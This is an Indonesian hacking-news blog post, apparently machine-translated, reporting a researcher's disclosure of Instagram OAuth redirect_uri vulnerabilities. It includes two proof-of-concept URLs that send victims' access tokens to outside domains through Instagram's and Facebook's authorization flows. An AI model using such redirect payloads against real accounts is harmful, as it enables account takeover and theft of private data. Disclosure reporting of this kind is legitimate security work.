Hacking Akun Instagram menggunakan kerentanan OAuth | Ini Blog ku - Hacking News
Ini Blog Ku - Hacking News

May 2, 2013

Hacking Akun Instagram menggunakan kerentanan OAuth

'Nir Goldshlager' dikenal sebagai hacker Facebook dan pendiri  Keamanan Break, yang melaporkan banyak bug kritis dalam mekanisme Facebook OAuth dalam beberapa bulan terakhir, hari ini mengungkapkan kerentanan kritis di Instagram OAuth yang memungkinkan penyerang untuk hack account apapun.
Hack Sukses memungkinkan penyerang untuk mengakses foto pribadi, kemampuan untuk menghapus foto korban dan mengedit komentar dan juga kemampuan untuk memposting foto baru.

Hacker menjelaskan bahwa ada dua cara untuk hack akun Instagram menggunakan OAuth :
  • membajak akun Instagram menggunakan Instagram OAuth atau membajak akun Instagram menggunakan Facebook OAuth Dialog.
Selama Nir berburu bug nya menemukan celah di Instagram parameter keamanan yaitu redirect_uri, yang memungkinkan penyerang untuk lulus akses token ke domain sendiri dengan mx sebagai akhiran yaitu kode langsung ke (breaksec . com . mx).

POC : https://instagram.com/oauth/authorize/?client_id=33221863eec546659f2564dd71a8a38d&redirect_uri=https://breaksec.com.mx&response_type=token


Hacking, Hacker, News



  • membajak hacker akun Instagram menggunakan Facebook OAuth Dialog. "Ketika seorang pengguna ingin meng-upload foto Instagram mereka ke Facebook, mereka memungkinkan interaksi dan integrasi ini berlangsung. Saya menemukan bahwa seorang penyerang dapat menggunakan hampir semua domain di redirect_uri, parameter berikutnya."
Hacking, akun, Instagram
Berikut penyerang dapat menggunakan domain di redirect_uri, parameter berikutnya melalui redirect_uri di Instagram client_id untuk mencuri token akses akun korban.

POC: https://www.facebook.com/connect/uiserver.php?app_id=124024574287414&next=http://files.nirgoldshlager.com&display=page&fbconnect=1&method=permissions.request&response_type=token.

Baca Juga Hacking menggunakan Kerentanan Oauth Lainnya.. :


Artikel Terkait

2komentar:

  1. Thx Infonya Gan, Kunjungi Juga Blog saya ya gan : Blog Taufiq Rahman

    ReplyDelete
  2. Okay. Really nice post man !

    ReplyDelete